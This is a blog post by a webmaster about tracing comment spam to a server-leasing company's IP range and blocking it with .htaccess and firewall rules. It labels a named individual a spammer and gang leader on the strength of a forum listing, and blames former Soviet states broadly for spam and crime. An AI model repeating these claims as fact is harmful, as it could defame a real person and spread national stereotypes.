A "Whois" look-up will reveal much about the owner of an IP address. Just look at the Whois info listed a few paragraphs above, where we found out that the offending IP belonging to UbiquityServers.com was assigned to a Romanian business. That information was just a tiny excerpt from what was revealed on Domain Tools.

It would appear that Ubiquity Server Solutions, Nobis Tech have some cleaning up to do. Server leasing companies should not turn a blind eye to their customers and hope that they will do nothing unlawful, or against the terms of service. They need to take a closer look at what is going on inside 108.62.150.0/24 - especially from 108.62.150.52. If one Googles the phrase "boboc alexandru spam" one of the results is a forum for tracking Dedicated spam servers running from ubiquityservers.com/nobistech.net. If you go to that page you will see not just UbiquityServers.com, but also IP ranges reassigned to "Boboc, Alexandru." His name appears 21 times, between page 7 and page 8 on that website. This person, whether his name is real or an alias, is himself a spammer. He is leasing out his dedicated servers to other spammers, in Romania and Russia. This is a Romanian Spam Gang.

Interesting note: Googling the phrase "ubiquity servers spam" produces 518,000 results! Webmasters around the World are blocking their entire IP space. I am one of those webmasters. Because my website is on a shared server, I must use the .htaccess method. This results in a Server 403 response to any contact coming from any IP within the Russian (and Romanian) blocklist. Those running or managing their own servers can block them at the firewall and nobody coming from that IP space will even see that a website exists when they try to POST or view spam comments or trackbacks.

In my case, because I do not allow trackbacks (for the very reason that when I did they were ALL SPAM LINKS), I am unable to see the destination URLs being spammed, but, I am fairly certain they aren't dropping by a 5+ year old article to just say hello!. If I was able to decipher them I would report them to the web hosts and domain Registrars with who they received their Internet connections. This usually results in termination of those accounts within hours or days. Thus, they created a little work for me, which happily resulted in this article and an new addition to the ever-increasing Russian Blocklist.

That blocklist, in both htaccess and iptables formats, includes numerous other Countries that used to make up the USSR. It is unbelievable how much spam, hacking, exploiting, identity theft and other badness emanates from the former member States of the Soviet Union. Just search this blog for the keywords Russian and Romanian and you will see lots of articles revealing the badness coming from those sources.

Posted by Wiz at 3:21 PM | Permalink

back to top ^